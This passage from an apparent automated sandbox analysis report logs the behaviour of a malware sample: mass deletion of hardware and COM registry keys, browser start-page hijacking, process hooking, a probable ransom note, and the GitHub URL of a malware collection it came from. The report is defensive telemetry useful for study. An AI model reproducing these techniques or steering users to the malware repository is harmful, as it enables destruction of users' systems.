| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "www.blacksnake.com" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{737361EC-467F-11D1-810F-0000F87557AA} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{305104A7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{131A6950-7F78-11D0-A979-00C04FD705A2}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CA79737-3185-4B3E-A5E0-F740FD602C69}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C68E3F27-AAD0-4DC4-B7E6-B3249770763D} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8948300F-8BD5-4728-A1D8-83D172295A9D}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{83567EDD-6E1F-4B9B-A413-2B1F50CC36DF}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{11B48E3F-E93F-4960-8998-F755B4D9C64D}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C0341-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AA14F9C9-62B5-4637-8AC4-8F25BF29D5A7}\DefaultExtension | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDEADEF2-C265-11D0-BCED-00A0C90AB50F} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CBB63A8D-BD57-11D2-9238-00A02448799A} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{26E7F0F1-B49C-48CB-B43E-78DCD577E1D9} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C033D-0000-0000-C000-000000000046}\TypeLib | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{91493441-5A91-11CF-8700-00AA0060263B}\VersionIndependentProgID | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FFA97AC5-C24F-4992-B8D1-3FA57E429A78} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E289DEAB-F709-49A9-B99E-282364074571} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CF7A98-2C45-4c8d-9151-2D716989DDAB}\Insertable | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CD45F185-1B21-48E2-967B-EAD743A8914E}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{a35b686f-455f-4848-b54c-056df7756c59} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0C52A2CC-66F1-4B2B-A9E4-9723791F0BBD}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4A3BCDE5-5F66-4CC8-9FA0-14275CCEE688} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\DirectShow\MediaObjects\120ced89-3bf4-4173-a132-3cb406cf3231 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4F55F4-8F87-4D47-80BB-5808164BB3F8}\Conversion\Readable | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{576D41A8-E5B0-4D96-8121-EA47D3DDC246} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{566A7BC7-B295-41B7-A818-12F9E5CA46CA}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C0376-0000-0000-C000-000000000046} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0002E161-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FD1A378C-F117-4F43-917C-DADCA1308606}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C3854CE3-9FDD-4249-8247-EC0574314CCC}\NumMethods | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC38853-C1B0-4176-A984-B298361027AF}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{91CE54EE-C67C-4B46-A4FF-99416F27A8BF}\1.0\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A4773A25-CDB6-54BB-931A-ACDCAFA3FD7D} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{305106F3-98B5-11CF-BB82-00AA00BDCE0B} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B3B9F9D0-EBFF-46A4-A847-D663D8B0977E}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{501C1E21-C557-48B8-BA30-A1EAB0BC4A74}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RAServer.EXE | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FF6D3520-E8D9-4E8C-BB75-CFFA7B03C633}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C093CB63-5EF5-4585-AF8E-4D5637487B57}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{95178EDB-6E08-489C-AA76-70446F7C42F4} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7EA23D88-569E-4EFD-9851-A1528A7745F9}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{70D2DC1E-4DCC-4786-A072-9A3B600C216B} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65C78325-1031-491E-8FB6-EF9991AFE363}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5F0F18BF-6AC5-48DE-8DA1-887BA728A752} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C6DBD569-032A-5FE3-B2BF-96CFDB985FDB} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C093CB63-5EF5-4585-AF8E-4D5637487B57}\TypeLib | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0F6B37E0-FCFE-44D9-9112-394CA9B92114}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C0391-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C0337-0000-0000-C000-000000000046}\TypeLib | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\DefaultIcon | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51973C26-CB0C-11D0-B5C9-00A0244A0E7A} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{23EFCF0C-1F8E-5BD9-8B57-F0850121201C} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0F7F24C1-74D9-4EA6-A3EA-7EDB2D81441D} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C032E-0000-0000-C000-000000000046}\TypeLib | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A2E3074F-6C3D-11D3-B653-00C04F79498E}\Instance\BDA MPEG2 Transport Information Filter | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{91493441-5A91-11CF-8700-00AA0060263B} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{03C2AEA5-BEFA-4C84-A187-C9245AC784F6} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C036F-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C033C-0000-0000-C000-000000000046} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0002E16B-0000-0000-C000-000000000046} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F73605E1-E491-4012-90BE-F8AAF1A8D179} | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{112756A1-3F04-4CCD-BFD6-ACB4BCA614C9}\ProxyStubClsid32 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeb0d73cb8,0x7ffeb0d73cc8,0x7ffeb0d73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
